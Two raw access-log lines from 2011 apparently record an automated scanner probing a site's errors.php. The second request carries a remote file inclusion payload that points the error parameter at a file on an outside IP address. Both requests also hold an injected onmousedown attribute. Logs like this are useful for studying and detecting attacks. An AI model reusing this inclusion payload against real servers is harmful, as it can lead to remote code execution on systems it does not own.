64.31.60.72 - - [24/Aug/2011:03:23:37 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','20','1','%2Faccounts%2Finc%2Ferrors.php%3Ferror%3D','',%20'00c1879e74723a6dcc503c2c0f1186556e9f70cdb835d68d9073',%200)//accounts/inc/errors.php?error=test?? HTTP/1.1" 404 557 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
64.31.60.72 - - [24/Aug/2011:03:23:39 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','20','1','%2Faccounts%2Finc%2Ferrors.php%3Ferror%3D','',%20'00c1879e74723a6dcc503c2c0f1186556e9f70cdb835d68d9073',%200)//accounts/inc/errors.php?error=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 404 557 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
